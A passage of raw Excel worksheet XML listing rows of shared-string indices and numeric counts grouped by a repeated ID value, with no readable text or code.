    <row r="14930" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14930" t="s">
        <v>16228</v>
      </c>
      <c r="B14930" t="s">
        <v>16217</v>
      </c>
      <c r="C14930">
        <v>5</v>
      </c>
      <c r="D14930">
        <v>537</v>
      </c>
    </row>
    <row r="14931" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14931" t="s">
        <v>16231</v>
      </c>
      <c r="B14931" t="s">
        <v>16218</v>
      </c>
      <c r="C14931">
        <v>15</v>
      </c>
      <c r="D14931">
        <v>537</v>
      </c>
    </row>
    <row r="14932" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14932" t="s">
        <v>16229</v>
      </c>
      <c r="B14932" t="s">
        <v>16219</v>
      </c>
      <c r="C14932">
        <v>0</v>
      </c>
      <c r="D14932">
        <v>537</v>
      </c>
    </row>
    <row r="14933" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14933" t="s">
        <v>16230</v>
      </c>
      <c r="B14933" t="s">
        <v>16220</v>
      </c>
      <c r="C14933">
        <v>0</v>
      </c>
      <c r="D14933">
        <v>537</v>
      </c>
    </row>
    <row r="14934" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14934" t="s">
        <v>16229</v>
      </c>
      <c r="B14934" t="s">
        <v>16221</v>
      </c>
      <c r="C14934">
        <v>38</v>
      </c>
      <c r="D14934">
        <v>537</v>
      </c>
    </row>
    <row r="14935" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14935" t="s">
        <v>16230</v>
      </c>
      <c r="B14935" t="s">
        <v>16222</v>
      </c>
      <c r="C14935">
        <v>72</v>
      </c>
      <c r="D14935">
        <v>537</v>
      </c>
    </row>
    <row r="14936" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14936" t="s">
        <v>16223</v>
      </c>
      <c r="B14936" t="s">
        <v>16223</v>
      </c>
      <c r="C14936">
        <v>30</v>
      </c>
      <c r="D14936">
        <v>537</v>
      </c>
    </row>
    <row r="14937" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14937" t="s">
        <v>16224</v>
      </c>
      <c r="B14937" t="s">
        <v>16224</v>
      </c>
      <c r="C14937">
        <v>0</v>
      </c>
      <c r="D14937">
        <v>537</v>
      </c>
    </row>
    <row r="14938" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14938" t="s">
        <v>16224</v>
      </c>
      <c r="B14938" t="s">
        <v>16224</v>
      </c>
      <c r="C14938">
        <v>1</v>
      </c>
      <c r="D14938">
        <v>51</v>
      </c>
    </row>
    <row r="14939" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14939" t="s">
        <v>16228</v>
      </c>
      <c r="B14939" t="s">
        <v>16211</v>
      </c>
      <c r="C14939">
        <v>0</v>
      </c>
      <c r="D14939">
        <v>1404</v>
      </c>
    </row>
    <row r="14940" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14940" t="s">
        <v>16231</v>
      </c>
      <c r="B14940" t="s">
        <v>16212</v>
      </c>
      <c r="C14940">
        <v>0</v>
      </c>
      <c r="D14940">
        <v>1404</v>
      </c>
    </row>
    <row r="14941" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14941" t="s">
        <v>16228</v>
      </c>
      <c r="B14941" t="s">
        <v>16213</v>
      </c>
      <c r="C14941">
        <v>0</v>
      </c>
      <c r="D14941">
        <v>1404</v>
      </c>
    </row>
    <row r="14942" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14942" t="s">
        <v>16231</v>
      </c>
      <c r="B14942" t="s">
        <v>16214</v>
      </c>
      <c r="C14942">
        <v>0</v>
      </c>
      <c r="D14942">
        <v>1404</v>
      </c>
    </row>
    <row r="14943" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14943" t="s">
        <v>16228</v>
      </c>
      <c r="B14943" t="s">
        <v>16215</v>
      </c>
      <c r="C14943">
        <v>1</v>
      </c>
      <c r="D14943">
        <v>1404</v>
      </c>
    </row>
    <row r="14944" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14944" t="s">
        <v>16231</v>
      </c>
      <c r="B14944" t="s">
        <v>16216</v>
      </c>
      <c r="C14944">
        <v>2</v>
      </c>
      <c r="D14944">
        <v>1404</v>
      </c>
    </row>
    <row r="14945" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14945" t="s">
        <v>16228</v>
      </c>
      <c r="B14945" t="s">
        <v>16217</v>
      </c>
      <c r="C14945">
        <v>1</v>
      </c>
      <c r="D14945">
        <v>1404</v>
      </c>
    </row>
    <row r="14946" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14946" t="s">
        <v>16231</v>
      </c>
      <c r="B14946" t="s">
        <v>16218</v>
      </c>
      <c r="C14946">
        <v>0</v>
      </c>
      <c r="D14946">
        <v>1404</v>
      </c>
    </row>
    <row r="14947" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14947" t="s">
        <v>16229</v>
      </c>
      <c r="B14947" t="s">
        <v>16219</v>
      </c>
      <c r="C14947">
        <v>0</v>
      </c>
      <c r="D14947">
        <v>1404</v>
      </c>
    </row>
    <row r="14948" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14948" t="s">
        <v>16230</v>
      </c>
      <c r="B14948" t="s">
        <v>16220</v>
      </c>
      <c r="C14948">
        <v>4</v>
      </c>
      <c r="D14948">
        <v>1404</v>
      </c>
    </row>
    <row r="14949" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14949" t="s">
        <v>16229</v>
      </c>
      <c r="B14949" t="s">
        <v>16221</v>
      </c>
      <c r="C14949">
        <v>23</v>
      </c>
      <c r="D14949">
        <v>1404</v>
      </c>
    </row>
    <row r="14950" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14950" t="s">
        <v>16230</v>
      </c>
      <c r="B14950" t="s">
        <v>16222</v>
      </c>
      <c r="C14950">
        <v>1</v>
      </c>
      <c r="D14950">
        <v>1404</v>
      </c>
    </row>
    <row r="14951" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14951" t="s">
        <v>16223</v>
      </c>
      <c r="B14951" t="s">
        <v>16223</v>
      </c>
      <c r="C14951">
        <v>6</v>
      </c>
      <c r="D14951">
        <v>1404</v>
      </c>
    </row>
    <row r="14952" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14952" t="s">
        <v>16224</v>
      </c>
      <c r="B14952" t="s">
        <v>16224</v>
      </c>
      <c r="C14952">
        <v>0</v>
      </c>
      <c r="D14952">
        <v>1404</v>
      </c>
    </row>
    <row r="14953" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14953" t="s">
        <v>16228</v>
      </c>
      <c r="B14953" t="s">
        <v>16215</v>
      </c>
      <c r="C14953">
        <v>14</v>
      </c>
      <c r="D14953">
        <v>452</v>
      </c>
    </row>
    <row r="14954" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14954" t="s">
        <v>16228</v>
      </c>
      <c r="B14954" t="s">
        <v>16217</v>
      </c>
      <c r="C14954">
        <v>309</v>
      </c>
      <c r="D14954">
        <v>452</v>
      </c>
    </row>
    <row r="14955" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14955" t="s">
        <v>16231</v>
      </c>
      <c r="B14955" t="s">
        <v>16218</v>
      </c>
      <c r="C14955">
        <v>12</v>
      </c>
      <c r="D14955">
        <v>452</v>
      </c>
    </row>
    <row r="14956" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14956" t="s">
        <v>16228</v>
      </c>
      <c r="B14956" t="s">
        <v>16211</v>
      </c>
      <c r="C14956">
        <v>0</v>
      </c>
      <c r="D14956">
        <v>5204</v>
      </c>
    </row>
    <row r="14957" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14957" t="s">
        <v>16231</v>
      </c>
      <c r="B14957" t="s">
        <v>16212</v>
      </c>
      <c r="C14957">
        <v>0</v>
      </c>
      <c r="D14957">
        <v>5204</v>
      </c>
    </row>
    <row r="14958" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14958" t="s">
        <v>16228</v>
      </c>
      <c r="B14958" t="s">
        <v>16213</v>
      </c>
      <c r="C14958">
        <v>0</v>
      </c>
      <c r="D14958">
        <v>5204</v>
      </c>
    </row>
    <row r="14959" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14959" t="s">
        <v>16231</v>
      </c>
      <c r="B14959" t="s">
        <v>16214</v>
      </c>
      <c r="C14959">
        <v>0</v>
      </c>
      <c r="D14959">
        <v>5204</v>
      </c>
    </row>
    <row r="14960" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14960" t="s">
        <v>16228</v>
      </c>
      <c r="B14960" t="s">
        <v>16215</v>
      </c>
      <c r="C14960">
        <v>1</v>
      </c>
      <c r="D14960">
        <v>5204</v>
      </c>
    </row>
    <row r="14961" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14961" t="s">
        <v>16231</v>
      </c>
      <c r="B14961" t="s">
        <v>16216</v>
      </c>
      <c r="C14961">
        <v>1</v>
      </c>
      <c r="D14961">
        <v>5204</v>
      </c>
    </row>
    <row r="14962" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14962" t="s">
        <v>16228</v>
      </c>
      <c r="B14962" t="s">
        <v>16217</v>
      </c>
      <c r="C14962">
        <v>8</v>
      </c>
      <c r="D14962">
        <v>5204</v>
      </c>
    </row>
    <row r="14963" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14963" t="s">
        <v>16231</v>
      </c>
      <c r="B14963" t="s">
        <v>16218</v>
      </c>
      <c r="C14963">
        <v>1</v>
      </c>
      <c r="D14963">
        <v>5204</v>
      </c>
    </row>
    <row r="14964" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14964" t="s">
        <v>16229</v>
      </c>
      <c r="B14964" t="s">
        <v>16219</v>
      </c>
      <c r="C14964">
        <v>0</v>
      </c>
      <c r="D14964">
        <v>5204</v>
      </c>
    </row>
    <row r="14965" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14965" t="s">
        <v>16230</v>
      </c>
      <c r="B14965" t="s">
        <v>16220</v>
      </c>
      <c r="C14965">
        <v>0</v>
      </c>
      <c r="D14965">
        <v>5204</v>
      </c>
    </row>
    <row r="14966" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14966" t="s">
        <v>16229</v>
      </c>
      <c r="B14966" t="s">
        <v>16221</v>
      </c>
      <c r="C14966">
        <v>0</v>
      </c>
      <c r="D14966">
        <v>5204</v>
      </c>
    </row>
    <row r="14967" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14967" t="s">
        <v>16230</v>
      </c>
      <c r="B14967" t="s">
        <v>16222</v>
      </c>
      <c r="C14967">
        <v>0</v>
      </c>
      <c r="D14967">
        <v>5204</v>
      </c>
    </row>
    <row r="14968" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14968" t="s">
        <v>16223</v>
      </c>
      <c r="B14968" t="s">
        <v>16223</v>
      </c>
      <c r="C14968">
        <v>20</v>
      </c>
      <c r="D14968">
        <v>5204</v>
      </c>
    </row>
    <row r="14969" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14969" t="s">
        <v>16224</v>
      </c>
      <c r="B14969" t="s">
        <v>16224</v>
      </c>
      <c r="C14969">
        <v>0</v>
      </c>
      <c r="D14969">
        <v>5204</v>
      </c>
    </row>
    <row r="14970" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14970" t="s">
        <v>16228</v>
      </c>
      <c r="B14970" t="s">
        <v>16211</v>
      </c>
      <c r="C14970">
        <v>1</v>
      </c>
      <c r="D14970">
        <v>1468</v>
      </c>
    </row>
    <row r="14971" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14971" t="s">
        <v>16231</v>
      </c>
      <c r="B14971" t="s">
        <v>16212</v>
      </c>
      <c r="C14971">
        <v>0</v>
      </c>
      <c r="D14971">
        <v>1468</v>
      </c>
    </row>
    <row r="14972" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14972" t="s">
        <v>16228</v>
      </c>
      <c r="B14972" t="s">
        <v>16213</v>
      </c>
      <c r="C14972">
        <v>0</v>
      </c>
      <c r="D14972">
        <v>1468</v>
      </c>
    </row>
    <row r="14973" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14973" t="s">
        <v>16231</v>
      </c>
      <c r="B14973" t="s">
        <v>16214</v>
      </c>
      <c r="C14973">
        <v>0</v>
      </c>
      <c r="D14973">
        <v>1468</v>
      </c>
    </row>
    <row r="14974" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14974" t="s">
        <v>16228</v>
      </c>
      <c r="B14974" t="s">
        <v>16215</v>
      </c>
      <c r="C14974">
        <v>24</v>
      </c>
      <c r="D14974">
        <v>1468</v>
      </c>
    </row>
    <row r="14975" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14975" t="s">
        <v>16231</v>
      </c>
      <c r="B14975" t="s">
        <v>16216</v>
      </c>
      <c r="C14975">
        <v>16</v>
      </c>
      <c r="D14975">
        <v>1468</v>
      </c>
    </row>
    <row r="14976" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14976" t="s">
        <v>16228</v>
      </c>
      <c r="B14976" t="s">
        <v>16217</v>
      </c>
      <c r="C14976">
        <v>126</v>
      </c>
      <c r="D14976">
        <v>1468</v>
      </c>
    </row>
    <row r="14977" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14977" t="s">
        <v>16231</v>
      </c>
      <c r="B14977" t="s">
        <v>16218</v>
      </c>
      <c r="C14977">
        <v>0</v>
      </c>
      <c r="D14977">
        <v>1468</v>
      </c>
    </row>
    <row r="14978" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14978" t="s">
        <v>16229</v>
      </c>
      <c r="B14978" t="s">
        <v>16219</v>
      </c>
      <c r="C14978">
        <v>0</v>
      </c>
      <c r="D14978">
        <v>1468</v>
      </c>
    </row>
    <row r="14979" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14979" t="s">
        <v>16230</v>
      </c>
      <c r="B14979" t="s">
        <v>16220</v>
      </c>
      <c r="C14979">
        <v>0</v>
      </c>
      <c r="D14979">
        <v>1468</v>
      </c>
    </row>
    <row r="14980" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14980" t="s">
        <v>16229</v>
      </c>
      <c r="B14980" t="s">
        <v>16221</v>
      </c>
      <c r="C14980">
        <v>5</v>
      </c>
      <c r="D14980">
        <v>1468</v>
      </c>
    </row>
    <row r="14981" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14981" t="s">
        <v>16230</v>
      </c>
      <c r="B14981" t="s">
        <v>16222</v>
      </c>
      <c r="C14981">
        <v>0</v>
      </c>
      <c r="D14981">
        <v>1468</v>
      </c>
    </row>
    <row r="14982" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14982" t="s">
        <v>16223</v>
      </c>
      <c r="B14982" t="s">
        <v>16223</v>
      </c>
      <c r="C14982">
        <v>26</v>
      </c>
      <c r="D14982">
        <v>1468</v>
      </c>
    </row>
    <row r="14983" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14983" t="s">
        <v>16224</v>
      </c>
      <c r="B14983" t="s">
        <v>16224</v>
      </c>
      <c r="C14983">
        <v>3</v>
      </c>
      <c r="D14983">
        <v>1468</v>
      </c>
    </row>
    <row r="14984" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14984" t="s">
        <v>16228</v>
      </c>
      <c r="B14984" t="s">
        <v>16211</v>
      </c>
      <c r="C14984">
        <v>0</v>
      </c>
      <c r="D14984">
        <v>1388</v>
      </c>
    </row>
    <row r="14985" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14985" t="s">
        <v>16231</v>
      </c>
      <c r="B14985" t="s">
        <v>16212</v>
      </c>
      <c r="C14985">
        <v>0</v>
      </c>
      <c r="D14985">
        <v>1388</v>
      </c>
    </row>
    <row r="14986" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14986" t="s">
        <v>16228</v>
      </c>
      <c r="B14986" t="s">
        <v>16213</v>
      </c>
      <c r="C14986">
        <v>1</v>
      </c>
      <c r="D14986">
        <v>1388</v>
      </c>
    </row>
    <row r="14987" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14987" t="s">
        <v>16231</v>
      </c>
      <c r="B14987" t="s">
        <v>16214</v>
      </c>
      <c r="C14987">
        <v>0</v>
      </c>
      <c r="D14987">
        <v>1388</v>
      </c>
    </row>
    <row r="14988" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14988" t="s">
        <v>16228</v>
      </c>
      <c r="B14988" t="s">
        <v>16215</v>
      </c>
      <c r="C14988">
        <v>1</v>
      </c>
      <c r="D14988">
        <v>1388</v>
      </c>
    </row>
    <row r="14989" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14989" t="s">
        <v>16231</v>
      </c>
      <c r="B14989" t="s">
        <v>16216</v>
      </c>
      <c r="C14989">
        <v>1</v>
      </c>
      <c r="D14989">
        <v>1388</v>
      </c>
    </row>
    <row r="14990" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14990" t="s">
        <v>16228</v>
      </c>
      <c r="B14990" t="s">
        <v>16217</v>
      </c>
      <c r="C14990">
        <v>9</v>
      </c>
      <c r="D14990">
        <v>1388</v>
      </c>
    </row>
    <row r="14991" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14991" t="s">
        <v>16231</v>
      </c>
      <c r="B14991" t="s">
        <v>16218</v>
      </c>
      <c r="C14991">
        <v>3</v>
      </c>
      <c r="D14991">
        <v>1388</v>
      </c>
    </row>
    <row r="14992" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14992" t="s">
        <v>16229</v>
      </c>
      <c r="B14992" t="s">
        <v>16219</v>
      </c>
      <c r="C14992">
        <v>0</v>
      </c>
      <c r="D14992">
        <v>1388</v>
      </c>
    </row>
    <row r="14993" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14993" t="s">
        <v>16230</v>
      </c>
      <c r="B14993" t="s">
        <v>16220</v>
      </c>
      <c r="C14993">
        <v>3</v>
      </c>
      <c r="D14993">
        <v>1388</v>
      </c>
    </row>
    <row r="14994" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14994" t="s">
        <v>16229</v>
      </c>
      <c r="B14994" t="s">
        <v>16221</v>
      </c>
      <c r="C14994">
        <v>56</v>
      </c>
      <c r="D14994">
        <v>1388</v>
      </c>
    </row>
    <row r="14995" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14995" t="s">
        <v>16230</v>
      </c>
      <c r="B14995" t="s">
        <v>16222</v>
      </c>
      <c r="C14995">
        <v>198</v>
      </c>
      <c r="D14995">
        <v>1388</v>
      </c>
    </row>
    <row r="14996" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14996" t="s">
        <v>16223</v>
      </c>
      <c r="B14996" t="s">
        <v>16223</v>
      </c>
      <c r="C14996">
        <v>0</v>
      </c>
      <c r="D14996">
        <v>1388</v>
      </c>
    </row>
    <row r="14997" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14997" t="s">
        <v>16224</v>
      </c>
      <c r="B14997" t="s">
        <v>16224</v>
      </c>
      <c r="C14997">
        <v>0</v>
      </c>
      <c r="D14997">
        <v>1388</v>
      </c>
    </row>
    <row r="14998" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14998" t="s">
        <v>16228</v>
      </c>
      <c r="B14998" t="s">
        <v>16211</v>
      </c>
      <c r="C14998">
        <v>0</v>
      </c>
      <c r="D14998">
        <v>1418</v>
      </c>
    </row>
    <row r="14999" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14999" t="s">
        <v>16231</v>
      </c>
      <c r="B14999" t="s">
        <v>16212</v>
      </c>
      <c r="C14999">
        <v>0</v>
      </c>
      <c r="D14999">
        <v>1418</v>
      </c>
    </row>
    <row r="15000" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15000" t="s">
        <v>16228</v>
      </c>
      <c r="B15000" t="s">
        <v>16213</v>
      </c>
      <c r="C15000">
        <v>0</v>
      </c>
      <c r="D15000">
        <v>1418</v>
      </c>
    </row>
    <row r="15001" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15001" t="s">
        <v>16231</v>
      </c>
      <c r="B15001" t="s">
        <v>16214</v>
      </c>
      <c r="C15001">
        <v>0</v>
      </c>
      <c r="D15001">
        <v>1418</v>
      </c>
    </row>
    <row r="15002" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15002" t="s">
        <v>16228</v>
      </c>
      <c r="B15002" t="s">
        <v>16215</v>
      </c>
      <c r="C15002">
        <v>2</v>
      </c>
      <c r="D15002">
        <v>1418</v>
      </c>
    </row>
    <row r="15003" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15003" t="s">
        <v>16231</v>
      </c>
      <c r="B15003" t="s">
        <v>16216</v>
      </c>
      <c r="C15003">
        <v>3</v>
      </c>
      <c r="D15003">
        <v>1418</v>
      </c>
    </row>
    <row r="15004" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15004" t="s">
        <v>16228</v>
      </c>
      <c r="B15004" t="s">
        <v>16217</v>
      </c>
      <c r="C15004">
        <v>8</v>
      </c>
      <c r="D15004">
        <v>1418</v>
      </c>
    </row>
    <row r="15005" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15005" t="s">
        <v>16231</v>
      </c>
      <c r="B15005" t="s">
        <v>16218</v>
      </c>
      <c r="C15005">
        <v>2</v>
      </c>
      <c r="D15005">
        <v>1418</v>
      </c>
    </row>
    <row r="15006" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15006" t="s">
        <v>16229</v>
      </c>
      <c r="B15006" t="s">
        <v>16219</v>
      </c>
      <c r="C15006">
        <v>1</v>
      </c>
      <c r="D15006">
        <v>1418</v>
      </c>
    </row>
    <row r="15007" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15007" t="s">
        <v>16230</v>
      </c>
      <c r="B15007" t="s">
        <v>16220</v>
      </c>
      <c r="C15007">
        <v>0</v>
      </c>
      <c r="D15007">
        <v>1418</v>
      </c>
    </row>
    <row r="15008" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15008" t="s">
        <v>16229</v>
      </c>
      <c r="B15008" t="s">
        <v>16221</v>
      </c>
      <c r="C15008">
        <v>104</v>
      </c>
      <c r="D15008">
        <v>1418</v>
      </c>
    </row>
    <row r="15009" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15009" t="s">
        <v>16230</v>
      </c>
      <c r="B15009" t="s">
        <v>16222</v>
      </c>
      <c r="C15009">
        <v>2</v>
      </c>
      <c r="D15009">
        <v>1418</v>
      </c>
    </row>
    <row r="15010" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15010" t="s">
        <v>16223</v>
      </c>
      <c r="B15010" t="s">
        <v>16223</v>
      </c>
      <c r="C15010">
        <v>30</v>
      </c>
      <c r="D15010">
        <v>1418</v>
      </c>
    </row>
    <row r="15011" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15011" t="s">
        <v>16224</v>
      </c>
      <c r="B15011" t="s">
        <v>16224</v>
      </c>
      <c r="C15011">
        <v>3</v>
      </c>
      <c r="D15011">
        <v>1418</v>
      </c>
    </row>
    <row r="15012" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15012" t="s">
        <v>16228</v>
      </c>
      <c r="B15012" t="s">
        <v>16211</v>
      </c>
      <c r="C15012">
        <v>0</v>
      </c>
      <c r="D15012">
        <v>1641</v>
      </c>
    </row>
    <row r="15013" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15013" t="s">
        <v>16231</v>
      </c>
      <c r="B15013" t="s">
        <v>16212</v>
      </c>
      <c r="C15013">
        <v>0</v>
      </c>
      <c r="D15013">
        <v>1641</v>
      </c>
    </row>
    <row r="15014" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15014" t="s">
        <v>16228</v>
      </c>
      <c r="B15014" t="s">
        <v>16213</v>
      </c>
      <c r="C15014">
        <v>0</v>
      </c>
      <c r="D15014">
        <v>1641</v>
      </c>
    </row>
    <row r="15015" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15015" t="s">
        <v>16231</v>
      </c>
      <c r="B15015" t="s">
        <v>16214</v>
      </c>
      <c r="C15015">
        <v>0</v>
      </c>
      <c r="D15015">
        <v>1641</v>
      </c>
    </row>
    <row r="15016" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15016" t="s">
        <v>16228</v>
      </c>
      <c r="B15016" t="s">
        <v>16215</v>
      </c>
      <c r="C15016">
        <v>1</v>
      </c>
      <c r="D15016">
        <v>1641</v>
      </c>
    </row>
    <row r="15017" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15017" t="s">
        <v>16231</v>
      </c>
      <c r="B15017" t="s">
        <v>16216</v>
      </c>
      <c r="C15017">
        <v>3</v>
      </c>
      <c r="D15017">
        <v>1641</v>
      </c>
    </row>
    <row r="15018" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15018" t="s">
        <v>16228</v>
      </c>
      <c r="B15018" t="s">
        <v>16217</v>
      </c>
      <c r="C15018">
        <v>5</v>
      </c>
      <c r="D15018">
        <v>1641</v>
      </c>
    </row>
    <row r="15019" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15019" t="s">
        <v>16231</v>
      </c>
      <c r="B15019" t="s">
        <v>16218</v>
      </c>
      <c r="C15019">
        <v>2</v>
      </c>
      <c r="D15019">
        <v>1641</v>
      </c>
    </row>
    <row r="15020" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15020" t="s">
        <v>16229</v>
      </c>
      <c r="B15020" t="s">
        <v>16219</v>
      </c>
      <c r="C15020">
        <v>0</v>
      </c>
      <c r="D15020">
        <v>1641</v>
      </c>
    </row>
    <row r="15021" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15021" t="s">
        <v>16230</v>
      </c>
      <c r="B15021" t="s">
        <v>16220</v>
      </c>
      <c r="C15021">
        <v>0</v>
      </c>
      <c r="D15021">
        <v>1641</v>
      </c>
    </row>
    <row r="15022" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15022" t="s">
        <v>16229</v>
      </c>
      <c r="B15022" t="s">
        <v>16221</v>
      </c>
      <c r="C15022">
        <v>5</v>
      </c>
      <c r="D15022">
        <v>1641</v>
      </c>
    </row>
    <row r="15023" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15023" t="s">
        <v>16230</v>
      </c>
      <c r="B15023" t="s">
        <v>16222</v>
      </c>
      <c r="C15023">
        <v>5</v>
      </c>
      <c r="D15023">
        <v>1641</v>
      </c>
    </row>
    <row r="15024" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15024" t="s">
        <v>16223</v>
      </c>
      <c r="B15024" t="s">
        <v>16223</v>
      </c>
      <c r="C15024">
        <v>20</v>
      </c>
      <c r="D15024">
        <v>1641</v>
      </c>
    </row>
    <row r="15025" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15025" t="s">
        <v>16224</v>
      </c>
      <c r="B15025" t="s">
        <v>16224</v>
      </c>
      <c r="C15025">
        <v>1</v>
      </c>
      <c r="D15025">
        <v>1641</v>
      </c>
    </row>
    <row r="15026" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15026" t="s">
        <v>16229</v>
      </c>
      <c r="B15026" t="s">
        <v>16221</v>
      </c>
      <c r="C15026">
        <v>35</v>
      </c>
      <c r="D15026">
        <v>1310</v>
      </c>
    </row>
    <row r="15027" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15027" t="s">
        <v>16229</v>
      </c>
      <c r="B15027" t="s">
        <v>16221</v>
      </c>
      <c r="C15027">
        <v>15</v>
      </c>
      <c r="D15027">
        <v>1310</v>
      </c>
    </row>
    <row r="15028" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15028" t="s">
        <v>16228</v>
      </c>
      <c r="B15028" t="s">
        <v>16211</v>
      </c>
      <c r="C15028">
        <v>0</v>
      </c>
      <c r="D15028">
        <v>1113</v>
      </c>
    </row>
    <row r="15029" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15029" t="s">
        <v>16231</v>
      </c>
      <c r="B15029" t="s">
        <v>16212</v>
      </c>
      <c r="C15029">
        <v>0</v>
      </c>
      <c r="D15029">
        <v>1113</v>
      </c>
    </row>
    <row r="15030" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15030" t="s">
        <v>16228</v>
      </c>
      <c r="B15030" t="s">
        <v>16213</v>
      </c>
      <c r="C15030">
        <v>0</v>
      </c>
      <c r="D15030">
        <v>1113</v>
      </c>
    </row>
    <row r="15031" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15031" t="s">
        <v>16231</v>
      </c>
      <c r="B15031" t="s">
        <v>16214</v>
      </c>
      <c r="C15031">
        <v>0</v>
      </c>
      <c r="D15031">
        <v>1113</v>
      </c>
    </row>
    <row r="15032" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15032" t="s">
        <v>16228</v>
      </c>
      <c r="B15032" t="s">
        <v>16215</v>
      </c>
      <c r="C15032">
        <v>2</v>
      </c>
      <c r="D15032">
        <v>1113</v>
      </c>
    </row>
    <row r="15033" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15033" t="s">
        <v>16231</v>
      </c>
      <c r="B15033" t="s">
        <v>16216</v>
      </c>
      <c r="C15033">
        <v>0</v>
      </c>
      <c r="D15033">
        <v>1113</v>
      </c>
    </row>
    <row r="15034" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A15034" t="s">
        <v>16228</v>
      </c>
      <c r="B15034" t="s">
        <v>16217</v>
      </c>
      <c r="C15034">
        <v>1</v>
      </c>
      <c r="D15034">
        <v>1113</v>
      </c>
